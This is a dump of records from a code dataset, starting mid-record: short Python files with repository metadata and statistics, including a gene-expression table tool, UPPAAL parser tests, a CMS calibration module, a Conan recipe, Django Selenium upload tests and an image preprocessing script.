] | null | null | null | omstools/RNAseq/general/expression_table_tools.py | bioShaun/OM004script | d604b565ae220f2ec7bfba7a8ef44018e7a33c12 | [
"MIT"
] | null | null | null | omstools/RNAseq/general/expression_table_tools.py | bioShaun/OM004script | d604b565ae220f2ec7bfba7a8ef44018e7a33c12 | [
"MIT"
] | 1 | 2018-05-06T03:14:39.000Z | 2018-05-06T03:14:39.000Z | #! /usr/bin/env python
import pandas as pd
import click
'''
gene expression matrix, with gene id in first column,
gene expression level of each sample in othre columns.
'''
@click.group(chain=True, invoke_without_command=True)
@click.argument('exp_table', type=click.STRING, required=True)
@click.pass_context
def main(ctx, exp_table):
ctx.obj['exp_table'] = exp_table
@main.command('merge_by_group')
@click.option(
'-s',
'--sample_inf',
type=click.STRING,
required=True,
help='sample vs group file, with group id in first column,\
sample id in second column, seperated with tab.')
@click.option(
'-o',
'--output',
type=click.STRING,
default='genes.group.matrix.txt',
help='table with mean expression level of each group.')
@click.pass_context
def merge_by_group(ctx, sample_inf, output):
sample_df = pd.read_table(sample_inf, header=None, index_col=1)
gene_exp_df = pd.read_table(ctx.obj['exp_table'], index_col=0)
sample_df.columns = ['Group']
merged_df = pd.merge(
sample_df, gene_exp_df.T, left_index=True, right_index=True)
merged_df_group = merged_df.groupby(['Group'])
out_df = merged_df_group.mean().T
out_df.to_csv(output, sep='\t')
if __name__ == '__main__':
main(obj={})
| 28.956522 | 69 | 0.668919 | 196 | 1,332 | 4.311224 | 0.392857 | 0.047337 | 0.053254 | 0.035503 | 0.108876 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001874 | 0.198949 | 1,332 | 45 | 70 | 29.6 | 0.790066 | 0.015766 | 0 | 0.181818 | 0 | 0 | 0.13403 | 0.019147 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0.060606 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8e46835d4dab379dfaa85e0dd7f14a2858fee546 | 3,144 | py | Python | tests/ast/parsers/test_uppaal_xml_model_parser.py | S-Lehmann/uppyyl-simulator | 1166432cd766165df2cab9f13c1285624d7c01c1 | [
"MIT"
] | 2 | 2020-09-09T15:42:23.000Z | 2020-11-04T17:50:57.000Z | tests/ast/parsers/test_uppaal_xml_model_parser.py | S-Lehmann/uppyyl-simulator | 1166432cd766165df2cab9f13c1285624d7c01c1 | [
"MIT"
] | null | null | null | tests/ast/parsers/test_uppaal_xml_model_parser.py | S-Lehmann/uppyyl-simulator | 1166432cd766165df2cab9f13c1285624d7c01c1 | [
"MIT"
] | null | null | null | import os
import pathlib
import pprint
import unittest
from uppyyl_simulator.backend.ast.parsers.uppaal_xml_model_parser import (
uppaal_xml_to_dict, uppaal_dict_to_system, uppaal_system_to_dict, uppaal_dict_to_xml
)
pp = pprint.PrettyPrinter(indent=4, compact=True)
printExpectedResults = False
printActualResults = False
test_model_path = './res/tests/uppaal_xml_testmodel.xml'
generated_model_folder = './res/tests/created_models'
######################
# Uppaal XML to dict #
######################
class TestUppaalXMLToDict(unittest.TestCase):
def setUp(self):
with open(test_model_path) as file:
uppaal_test_model_str = file.read()
self.system_xml_str = uppaal_test_model_str
print("")
def test_uppaal_xml_to_dict(self):
_dict_data = uppaal_xml_to_dict(self.system_xml_str)
# print(dict_data)
#########################
# Uppaal dict to system #
#########################
class TestUppaalDictToSystem(unittest.TestCase):
def setUp(self):
with open(test_model_path) as file:
uppaal_test_model_str = file.read()
self.system_xml_str = uppaal_test_model_str
print("")
def test_uppaal_dict_to_system(self):
dict_data = uppaal_xml_to_dict(self.system_xml_str)
_system = uppaal_dict_to_system(dict_data)
# print(system)
######################
# Uppaal dict to XML #
######################
class TestUppaalDictToXML(unittest.TestCase):
def setUp(self):
with open(test_model_path) as file:
uppaal_test_model_str = file.read()
self.system_xml_str = uppaal_test_model_str
print("")
def test_uppaal_dict_to_system(self):
dict_data = uppaal_xml_to_dict(self.system_xml_str)
system_xml_str = uppaal_dict_to_xml(dict_data)
generated_model_name = 'testmodel.xml'
generated_model_path = os.path.join(generated_model_folder, generated_model_name)
pathlib.Path(generated_model_folder).mkdir(parents=True, exist_ok=True)
with open(generated_model_path, 'w') as file:
file.write(system_xml_str)
# print(system_xml_str)
######################
# Uppaal dict to XML #
######################
class TestUppaalXMLFullCycle(unittest.TestCase):
def setUp(self):
with open(test_model_path) as file:
uppaal_test_model_str = file.read()
self.system_xml_str = uppaal_test_model_str
print("")
def test_uppaal_dict_to_system(self):
dict_data = uppaal_xml_to_dict(self.system_xml_str)
system = uppaal_dict_to_system(dict_data)
dict_data_rev = uppaal_system_to_dict(system)
system_xml_str_rev = uppaal_dict_to_xml(dict_data_rev)
generated_model_name = 'testmodel_full_cycle.xml'
generated_model_path = os.path.join(generated_model_folder, generated_model_name)
pathlib.Path(generated_model_folder).mkdir(parents=True, exist_ok=True)
with open(generated_model_path, 'w') as file:
file.write(system_xml_str_rev)
# print(system_xml_str_rev)
if __name__ == '__main__':
unittest.main()
| 32.412371 | 89 | 0.675573 | 408 | 3,144 | 4.767157 | 0.161765 | 0.064781 | 0.086375 | 0.074036 | 0.679177 | 0.643188 | 0.627249 | 0.602571 | 0.602571 | 0.602571 | 0 | 0.000393 | 0.190204 | 3,144 | 96 | 90 | 32.75 | 0.763551 | 0.051209 | 0 | 0.52459 | 0 | 0 | 0.039096 | 0.030846 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131148 | false | 0 | 0.081967 | 0 | 0.278689 | 0.131148 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e4bf6aee8a7192603975091182590a4593906f9 | 4,160 | py | Python | CalibMuon/DTCalibration/python/Workflow/DTDQMValidation.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | CalibMuon/DTCalibration/python/Workflow/DTDQMValidation.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | CalibMuon/DTCalibration/python/Workflow/DTDQMValidation.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | from tools import loadCmsProcess,loadCrabCfg,loadCrabDefault,addCrabInputFile,writeCfg,prependPaths
from addPoolDBESSource import addPoolDBESSource
from CrabTask import *
import os
class DTDQMValidation:
#def __init__(self, run, dir, input_db, config):
def __init__(self, run, dir, config):
self.outputfile = 'DQM.root'
self.config = config
self.dir = dir
#self.inputdb = input_db
self.pset_name = 'dtDQM_cfg.py'
self.pset_template = 'CalibMuon.DTCalibration.dtDQMAlca_cfg'
if hasattr(self.config,'runOnCosmics') and self.config.runOnCosmics:
self.pset_template = 'CalibMuon.DTCalibration.dtDQMAlca_cosmics_cfg'
self.process = None
self.crab_cfg = None
self.initProcess()
self.initCrab()
self.task = CrabTask(self.dir,self.crab_cfg)
def initProcess(self):
self.process = loadCmsProcess(self.pset_template)
self.process.GlobalTag.globaltag = self.config.globaltag
if hasattr(self.config,'inputDBTag') and self.config.inputDBTag:
tag = self.config.inputDBTag
record = self.config.inputDBRcd
connect = self.config.connectStrDBTag
moduleName = 'customDB%s' % record
addPoolDBESSource(process = self.process,
moduleName = moduleName,record = record,tag = tag,
connect = connect)
if hasattr(self.config,'inputTTrigDB') and self.config.inputTTrigDB:
label = ''
if hasattr(self.config,'runOnCosmics') and self.config.runOnCosmics: label = 'cosmics'
addPoolDBESSource(process = self.process,
moduleName = 'tTrigDB',record = 'DTTtrigRcd',tag = 'ttrig',label = label,
connect = 'sqlite_file:%s' % os.path.basename(self.config.inputTTrigDB))
if hasattr(self.config,'inputVDriftDB') and self.config.inputVDriftDB:
addPoolDBESSource(process = self.process,
moduleName = 'vDriftDB',record = 'DTMtimeRcd',tag = 'vDrift',
connect = 'sqlite_file:%s' % os.path.basename(self.config.inputVDriftDB))
if hasattr(self.config,'inputT0DB') and self.config.inputT0DB:
addPoolDBESSource(process = self.process,
moduleName = 't0DB',record = 'DTT0Rcd',tag = 't0',
connect = 'sqlite_file:%s' % os.path.basename(self.config.inputT0DB))
if hasattr(self.config,'runOnRAW') and self.config.runOnRAW:
if hasattr(self.config,'runOnMC') and self.config.runOnMC:
getattr(self.process,self.config.digilabel).inputLabel = 'rawDataCollector'
prependPaths(self.process,self.config.digilabel)
if hasattr(self.config,'preselection') and self.config.preselection:
pathsequence = self.config.preselection.split(':')[0]
seqname = self.config.preselection.split(':')[1]
self.process.load(pathsequence)
prependPaths(self.process,seqname)
def initCrab(self):
crab_cfg_parser = loadCrabCfg()
loadCrabDefault(crab_cfg_parser,self.config)
crab_cfg_parser.set('CMSSW','pset',self.pset_name)
crab_cfg_parser.set('CMSSW','output_file',self.outputfile)
crab_cfg_parser.remove_option('USER','additional_input_files')
#if self.inputdb:
# addCrabInputFile(crab_cfg_parser,self.inputdb)
if hasattr(self.config,'inputTTrigDB') and self.config.inputTTrigDB:
addCrabInputFile(crab_cfg_parser,self.config.inputTTrigDB)
if hasattr(self.config,'inputVDriftDB') and self.config.inputVDriftDB:
addCrabInputFile(crab_cfg_parser,self.config.inputVDriftDB)
if hasattr(self.config,'inputT0DB') and self.config.inputT0DB:
addCrabInputFile(crab_cfg_parser,self.config.inputT0DB)
self.crab_cfg = crab_cfg_parser
def writeCfg(self):
writeCfg(self.process,self.dir,self.pset_name)
#writeCfgPkl(self.process,self.dir,self.pset_name)
def run(self):
self.project = self.task.run()
return self.project
| 45.217391 | 103 | 0.657692 | 445 | 4,160 | 6.033708 | 0.220225 | 0.148976 | 0.058101 | 0.084916 | 0.468901 | 0.330354 | 0.259218 | 0.236872 | 0.236872 | 0.113966 | 0 | 0.003456 | 0.234856 | 4,160 | 91 | 104 | 45.714286 | 0.840088 | 0.044471 | 0 | 0.142857 | 0 | 0 | 0.10529 | 0.026196 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057143 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f3d38847c649b72fcc42d62c95606105c0f32cc1 | 820 | py | Python | ExamPrep/06 Differentiation/shigRichardson.py | FHomewood/ScientificComputing | bc3477b4607b25a700f2d89ca4f01cb3ea0998c4 | [
"IJG"
] | null | null | null | ExamPrep/06 Differentiation/shigRichardson.py | FHomewood/ScientificComputing | bc3477b4607b25a700f2d89ca4f01cb3ea0998c4 | [
"IJG"
] | null | null | null | ExamPrep/06 Differentiation/shigRichardson.py | FHomewood/ScientificComputing | bc3477b4607b25a700f2d89ca4f01cb3ea0998c4 | [
"IJG"
] | null | null | null | #This script takes a pair of inputs, one of a point and another of an interval width, then differentates f(x) at the selected point, using the given step size. to input f(x) and f'(x) simply replace " 'FUNC' " or " 'FUNCPRIME' " with the function.
import numpy as np
#User inputs below.
x=input('Please pick an x value: ')
h=input('Please pick an h value: ')
g=h/2 #Splits the step in half for use in Richardson Extrapolation formula in case that h_2=h_1/2.
#Creates 4 arguments for tanh functions.
x1=x+g
x2=x-g
x3=x+h
x4=x-h
G=(('FUNC'(x1)-'FUNC'(x2))*(4/(3*h)))-(('FUNC'(x3)-'FUNC'(x4))*(1/(6*h))) #The Richardson Formula.
error=((G-('FUNCPRIME'(x))**-2)/('FUNCPRIME'(x)**-2))*100 #Error on approximation as a percentage of the true value.
print 'Richardson Extrapolation Result: ',G
print 'Error: ', error,'%'
| 37.272727 | 247 | 0.687805 | 151 | 820 | 3.721854 | 0.503311 | 0.010676 | 0.053381 | 0.060498 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031474 | 0.147561 | 820 | 21 | 248 | 39.047619 | 0.772532 | 0.578049 | 0 | 0 | 0 | 0 | 0.361765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f3d721d2677fd7cf2e8fd3efa23951b17ef439df | 287 | py | Python | server/client-server/app/models/detection.py | ioangatop/yolo | c65a72337369572bc07090f39123e2bf6ff5f4a3 | [
"MIT"
] | 1 | 2021-06-28T01:22:38.000Z | 2021-06-28T01:22:38.000Z | server/client-server/app/models/detection.py | ioangatop/yolo | c65a72337369572bc07090f39123e2bf6ff5f4a3 | [
"MIT"
] | null | null | null | server/client-server/app/models/detection.py | ioangatop/yolo | c65a72337369572bc07090f39123e2bf6ff5f4a3 | [
"MIT"
] | null | null | null | from pydantic import BaseModel
from typing import List
class DetectionModel(BaseModel):
class Detection(BaseModel):
bbox: List[int]
score: float
category_id: int
label: str
segmentation: List[List[List[int]]]
detections: List[Detection]
| 22.076923 | 43 | 0.665505 | 32 | 287 | 5.9375 | 0.59375 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25784 | 287 | 12 | 44 | 23.916667 | 0.892019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f3d8515a3338d8385cf2bebf5ed4ad028409b12a | 1,054 | py | Python | conanfile.py | bincrafters/conan-clara | 249560de1fa2a8b1ecc2d2b1e517a6d1ea0e37ed | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-clara | 249560de1fa2a8b1ecc2d2b1e517a6d1ea0e37ed | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-clara | 249560de1fa2a8b1ecc2d2b1e517a6d1ea0e37ed | [
"MIT"
] | null | null | null | from conans import ConanFile, tools
import os
class ClaraConan(ConanFile):
name = "clara"
version = "1.1.5"
description = "A simple to use, composable, command line parser for C++ 11 and beyond"
url = "https://github.com/bincrafters/conan-clara"
homepage = "https://github.com/catchorg/Clara"
topics = ("conan", "clara", "cli", "cpp11", "command-parser")
license = "BSL-1.0"
_source_subfolder = "source_subfolder"
exports = ["LICENSE.md"]
no_copy_source = True
def source(self):
tools.get("{0}/archive/v{1}.zip".format(self.homepage, self.version))
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir.capitalize(), self._source_subfolder)
def package(self):
include_folder_src = os.path.join(self._source_subfolder, "single_include")
self.copy(pattern="LICENSE.txt", dst="license", src=self._source_subfolder)
self.copy(pattern="*.hpp", dst="include", src=include_folder_src)
def package_id(self):
self.info.header_only()
| 36.344828 | 90 | 0.666983 | 137 | 1,054 | 4.985401 | 0.540146 | 0.10981 | 0.083455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012821 | 0.185958 | 1,054 | 28 | 91 | 37.642857 | 0.783217 | 0 | 0 | 0 | 0 | 0 | 0.270398 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.086957 | 0 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
f3e92fc2debbd4ed8ba3dbb42a7b21159248f8b8 | 5,419 | py | Python | fileapi/tests/test_functional.py | mlavin/fileapi | 25e13399e227d14e7fd14ebeaadf535f1dc3218a | [
"BSD-2-Clause"
] | 12 | 2015-01-20T21:08:45.000Z | 2018-06-17T19:58:50.000Z | fileapi/tests/test_functional.py | mlavin/fileapi | 25e13399e227d14e7fd14ebeaadf535f1dc3218a | [
"BSD-2-Clause"
] | null | null | null | fileapi/tests/test_functional.py | mlavin/fileapi | 25e13399e227d14e7fd14ebeaadf535f1dc3218a | [
"BSD-2-Clause"
] | 5 | 2015-01-20T21:51:14.000Z | 2020-06-27T11:31:32.000Z | import os
import shutil
import tempfile
from django.contrib.auth.models import User
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.core.files.storage import FileSystemStorage
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
from .. import views
class FunctionalTests(StaticLiveServerTestCase):
"""Iteractive tests with selenium."""
@classmethod
def setUpClass(cls):
cls.browser = webdriver.PhantomJS()
super().setUpClass()
@classmethod
def tearDownClass(cls):
cls.browser.quit()
super().tearDownClass()
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self._orig_storage = views.storage
views.storage = FileSystemStorage(self.temp_dir)
self.username = 'test'
self.password = 'test'
User.objects.create_user(self.username, '', self.password)
def tearDown(self):
shutil.rmtree(self.temp_dir)
views.storage = self._orig_storage
def test_show_login(self):
"""The login should be shown on page load."""
self.browser.get(self.live_server_url)
form = self.browser.find_element_by_id('login')
upload = self.browser.find_element_by_id('upload')
self.assertTrue(form.is_displayed(), 'Login form should be visible.')
self.assertFalse(upload.is_displayed(), 'Upload area should not be visible.')
def login(self, username, password):
"""Helper for login form submission."""
self.browser.get(self.live_server_url)
form = self.browser.find_element_by_id('login')
username_input = form.find_element_by_name('username')
username_input.send_keys(username)
password_input = form.find_element_by_name('password')
password_input.send_keys(password)
form.submit()
def test_login(self):
"""Submit the login form with a valid login."""
self.login(self.username, self.password)
WebDriverWait(self.browser, 5).until(
expected_conditions.visibility_of_element_located((By.ID, 'upload')))
form = self.browser.find_element_by_id('login')
self.assertFalse(form.is_displayed(), 'Login form should no longer be visible.')
def test_invalid_login(self):
"""Submit the login form with an invalid login."""
self.login(self.username, self.password[1:])
error = WebDriverWait(self.browser, 5).until(
expected_conditions.presence_of_element_located((By.CLASS_NAME, 'error')))
self.assertEqual('Invalid username/password', error.text)
form = self.browser.find_element_by_id('login')
self.assertTrue(form.is_displayed(), 'Login form should still be visible.')
def test_browse_files(self):
"""Browse existing uploads."""
_, test_file = tempfile.mkstemp(dir=self.temp_dir)
self.login(self.username, self.password)
element = WebDriverWait(self.browser, 5).until(
expected_conditions.presence_of_element_located((By.CLASS_NAME, 'file')))
self.assertIn(os.path.basename(test_file), element.text)
def test_file_delete(self):
"""Delete uploaded file."""
_, test_file = tempfile.mkstemp(dir=self.temp_dir)
self.login(self.username, self.password)
element = WebDriverWait(self.browser, 5).until(
expected_conditions.presence_of_element_located((By.CLASS_NAME, 'file')))
element.find_element_by_class_name('delete').click()
self.browser.implicitly_wait(1)
with self.assertRaises(NoSuchElementException):
self.browser.find_element_by_class_name('file')
self.assertFalse(os.path.exists(test_file))
def upload(self, filepath):
# Create file input for fake drag and drop
self.browser.execute_script('''
input = $('<input>', {id: 'seleniumUpload', type: 'file'}).appendTo('body');
''');
self.browser.find_element_by_id('seleniumUpload').send_keys(filepath)
# Fake a file drag and drop event
self.browser.execute_script('''
event = $.Event('drop');
event.originalEvent = {
dataTransfer: {files: input.get(0).files}
};
$('#upload').trigger(event);
''');
def test_file_upload(self):
"""Drag and drop a new file upload."""
self.login(self.username, self.password)
_, test_file = tempfile.mkstemp()
with open(test_file, 'w') as f:
f.write('XXX')
self.upload(test_file)
element = WebDriverWait(self.browser, 5).until(
expected_conditions.presence_of_element_located((By.CLASS_NAME, 'file')))
self.assertIn(os.path.basename(test_file), element.text)
def test_invalid_file(self):
"""Drag and drop a new file upload."""
self.login(self.username, self.password)
_, test_file = tempfile.mkstemp()
self.upload(test_file)
element = WebDriverWait(self.browser, 5).until(
expected_conditions.presence_of_element_located((By.CLASS_NAME, 'error')))
self.assertEqual('The submitted file is empty.', element.text) | 38.985612 | 90 | 0.667466 | 645 | 5,419 | 5.426357 | 0.226357 | 0.056571 | 0.037143 | 0.048 | 0.463429 | 0.445429 | 0.407143 | 0.354 | 0.33 | 0.307714 | 0 | 0.002121 | 0.217014 | 5,419 | 139 | 91 | 38.985612 | 0.822767 | 0.069939 | 0 | 0.333333 | 0 | 0 | 0.118142 | 0.010813 | 0 | 0 | 0 | 0 | 0.098039 | 1 | 0.127451 | false | 0.117647 | 0.117647 | 0 | 0.254902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f3f141bdc04d2f72d58f01681d83051418752dbc | 1,462 | py | Python | DomJudge/practica4/GRIDGRAP.py | Camiloasc1/AlgorithmsUNAL | 1542b8f2c170f9b5a24638f05ae50fa2c85cfc7b | [
"MIT"
] | null | null | null | DomJudge/practica4/GRIDGRAP.py | Camiloasc1/AlgorithmsUNAL | 1542b8f2c170f9b5a24638f05ae50fa2c85cfc7b | [
"MIT"
] | null | null | null | DomJudge/practica4/GRIDGRAP.py | Camiloasc1/AlgorithmsUNAL | 1542b8f2c170f9b5a24638f05ae50fa2c85cfc7b | [
"MIT"
] | null | null | null | import sys
def solve2(n, m):
if n == 1 and m == 1:
return []
check = []
count = 1
for i in xrange(n):
for j in xrange(m):
if j + 1 <= m and (count + 1 <= (n * m)) and not(count + 1 > m * (i + 1)):
check.append([count, count + 1])
if (i + 1 <= n) and ((m * (i + 1)) + j + 1 <= (n * m)):
check.append([count, (m * (i + 1)) + j + 1])
count += 1
return check
def solve(n1, m):
if n1 == 1 and m == 1:
return []
G = []
count = 1
for i in xrange(n1):
G.append([])
for j in xrange(m):
G[i].append(count)
count += 1
check = []
for i in xrange(n1):
for j in xrange(m):
if j + 1 < m:
check.append([G[i][j], G[i][j + 1]])
if i + 1 < n1:
check.append([G[i][j], G[i + 1][j]])
count += 1
return check
def printList(edges):
i = 0
check = ""
for edge in edges:
if i < 1:
i = 1
check += str(edge[0]) + "-" + str(edge[1])
else:
check += " " + edge[0].__str__() + "-" + edge[1].__str__()
print check
def gridGraph():
input = sys.stdin.read().splitlines()
for line in input:
nums = line.split()
n = int(nums[0])
m = int(nums[1])
edgeList = solve(n, m)
printList(edgeList)
gridGraph()
| 24.779661 | 86 | 0.406293 | 205 | 1,462 | 2.858537 | 0.190244 | 0.081911 | 0.061433 | 0.061433 | 0.397611 | 0.177474 | 0.116041 | 0.061433 | 0.061433 | 0 | 0 | 0.045238 | 0.425445 | 1,462 | 58 | 87 | 25.206897 | 0.652381 | 0 | 0 | 0.307692 | 0 | 0 | 0.002052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.019231 | null | null | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f3f696fb5d353f40355ec08222eead1d79939673 | 1,202 | py | Python | dvc_preprocessing/macros.py | pedrodamas0803/dvc_preprocessing | eeb307f94b96567d612b4db2c277561c4ec2296f | [
"MIT"
] | null | null | null | dvc_preprocessing/macros.py | pedrodamas0803/dvc_preprocessing | eeb307f94b96567d612b4db2c277561c4ec2296f | [
"MIT"
] | null | null | null | dvc_preprocessing/macros.py | pedrodamas0803/dvc_preprocessing | eeb307f94b96567d612b4db2c277561c4ec2296f | [
"MIT"
] | null | null | null | from dvc_preprocessing import plot, preprocessing, constants
from skimage.filters import threshold_otsu
import numpy as np
def auto_processing(filename, dirpath='./', data_type=np.int16, init_slice=0, final_slice="last", outname="output", ret="True"):
'''
TODO: add outpath
'''
stack = preprocessing.read_images_from_h5(filename, data_type, dirpath)
threshold_value = threshold_otsu(stack)
print(f'Threshold value: {threshold_value}.')
stack = preprocessing.intensity_rescaling(stack)
if data_type == np.int8:
stack[stack < threshold_value] = constants.INT8MINVAL()
else:
stack[stack < threshold_value] = constants.INT16MINVAL()
if final_slice == "last":
final_slice = stack.shape[0]
CoM = preprocessing.volume_CoM(stack, init_slice, final_slice)
print(f'The center of mass is {CoM}')
if init_slice != 0 or final_slice != "last":
stack = preprocessing.crop_around_CoM(
stack, CoM, (init_slice, final_slice))
else:
stack = preprocessing.crop_around_CoM(stack, CoM)
preprocessing.save_3d_tiff(stack, outname, dirpath)
if ret == True:
return stack, CoM, threshold_value
| 30.820513 | 128 | 0.693012 | 151 | 1,202 | 5.298013 | 0.410596 | 0.075 | 0.0525 | 0.06 | 0.18 | 0.0975 | 0.0975 | 0 | 0 | 0 | 0 | 0.011435 | 0.199667 | 1,202 | 38 | 129 | 31.631579 | 0.820166 | 0.014143 | 0 | 0.083333 | 0 | 0 | 0.073567 | 0 | 0 | 0 | 0 | 0.026316 | 0 | 1 | 0.041667 | false | 0 | 0.125 | 0 | 0.208333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.